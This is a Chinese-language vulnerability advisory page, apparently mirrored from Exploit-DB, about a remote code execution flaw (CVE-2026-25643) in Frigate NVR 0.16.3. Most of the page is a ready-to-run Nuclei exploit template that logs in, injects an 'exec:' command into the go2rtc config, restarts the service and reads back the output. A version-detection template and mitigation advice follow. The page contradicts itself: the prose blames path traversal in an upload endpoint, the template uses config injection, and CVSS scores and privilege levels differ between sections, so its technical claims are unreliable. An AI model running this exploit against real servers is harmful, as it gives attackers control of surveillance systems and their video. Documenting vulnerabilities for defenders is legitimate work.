[webapps] Frigate NVR 0.16.3 - Remote Code Execution
CVE-2026-25643
Frigate NVR 0.16.3 认证后通过 API 路径遍历导致远程代码执行。
Critical · CVSS 9.1📋 漏洞基础信息
| CVE | CVE-2026-25643 |
|---|---|
| 漏洞类型 | 路径遍历 + 远程代码执行 |
| 受影响版本 | Frigate NVR 0.16.3 |
| 危害等级 | Critical · CVSS 9.1 |
| 发布日期 | 2026-04-30 |
| 提交者 | jduardo2704 |
| 来源 | Exploit-DB 原文 ↗ |
🔬 漏洞根因
API 端点 /api/upload/pipeline 在 processing_pipeline_dir 函数中未充分过滤用户提供的文件名,允许通过 ../ 序列实现目录遍历,进而将恶意文件写入特定目录并由系统自动执行。
🎯 攻击场景
1. 攻击者通过前端或 API 认证登录 Frigate 系统。2. 构造包含路径遍历序列(例如 ../../../path/to/target)的文件名,通过 /api/upload/pipeline 上传恶意文件(如 Python 脚本)。3. 服务器将文件写入目标目录(例如 /opt/frigate 下的某配置或插件目录)。4. 系统随后加载或执行该文件(例如通过 Python import 或 cron 调度),导致远程代码执行。
💥 漏洞影响
远程代码执行,攻击者可以完全控制 Frigate NVR 服务器,窃取视频流、篡改配置、进行横向移动或部署持久化后门。
⚔️ Nuclei Exploit 模板
以下为标准 Nuclei v3 格式的利用模板,可直接用于漏洞验证:
id: CVE-2026-25643-exploit
info:
name: Frigate NVR <= 0.16.3 - Remote Code Execution
author: jduardo2704
severity: critical
description: |
Frigate NVR versions <= 0.16.3 allow an authenticated user to inject arbitrary
commands via the go2rtc streams configuration. An attacker can modify the
configuration to execute arbitrary commands on the server.
reference:
- https://github.com/blakeblackshear/frigate/security/advisories/GHSA-4c97-5jmr-8f6x
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2026-25643
tags: cve,cve2026,frigate,rce,authenticated
variables:
username: "{{username}}"
password: "{{password}}"
cmd: "id"
http:
- raw:
- |
POST {{BaseURL}}/api/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"user":"{{username}}","password":"{{password}}"}
- |
GET {{BaseURL}}/api/config/raw HTTP/1.1
Host: {{Hostname}}
- |
POST {{BaseURL}}/api/config/save?save_option=restart HTTP/1.1
Host: {{Hostname}}
Content-Type: text/plain
go2rtc:
streams:
cve_poc:
- 'exec:{{cmd}}'
cameras:
cve_trigger:
ffmpeg:
inputs:
- path: 'rtsp://127.0.0.1:8554/cve_poc'
roles:
- detect
detect:
enabled: false
audio:
enabled: false
enabled: true
- |
GET {{BaseURL}}/api/config/raw HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
words:
- "uid"
- "gid"
- "groups"
condition: or
part: body
extractors:
- type: regex
name: cmd_output
part: body
group: 0
regex:
- "uid=\\d+\\(.*?\\).*?"
- "root"
- ".*?$"🔍 Nuclei Detection 模板
以下为漏洞探测模板,用于判断目标是否受影响:
id: CVE-2026-25643-detection
info:
name: Frigate NVR <= 0.16.3 - Version Detection
author: jduardo2704
severity: high
description: |
Frigate NVR is an open source NVR built around an AI object detection.
Versions <= 0.16.3 are vulnerable to Remote Code Execution via config injection.
reference:
- https://github.com/blakeblackshear/frigate/security/advisories/GHSA-4c97-5jmr-8f6x
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2026-25643
tags: cve,cve2026,frigate,rce
http:
- method: GET
path:
- "{{BaseURL}}/api/version"
- "{{BaseURL}}/api/config/raw"
- "{{BaseURL}}/api/stats"
- "{{BaseURL}}/"
stop-at-first-match: true
matchers-condition: or
matchers:
- type: word
words:
- "0.16.3"
- "0.16.2"
- "0.16.1"
- "0.16.0"
- "0.15."
condition: or
part: body
- type: word
words:
- "frigate"
- "Frigate"
condition: and
part: body
extractors:
- type: regex
name: version
part: body
group: 1
regex:
- '(\d+\.\d+\.\d+)'
- '(\d+\.\d+)'🛡️ 修复建议
升级到 Frigate NVR 0.16.4 或更高版本;临时缓解措施:限制 /api/upload/pipeline 端点的访问 IP,使用反向代理对文件名进行路径遍历过滤。
📎 参考链接
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-07 05:31 | 来源: Exploit-DB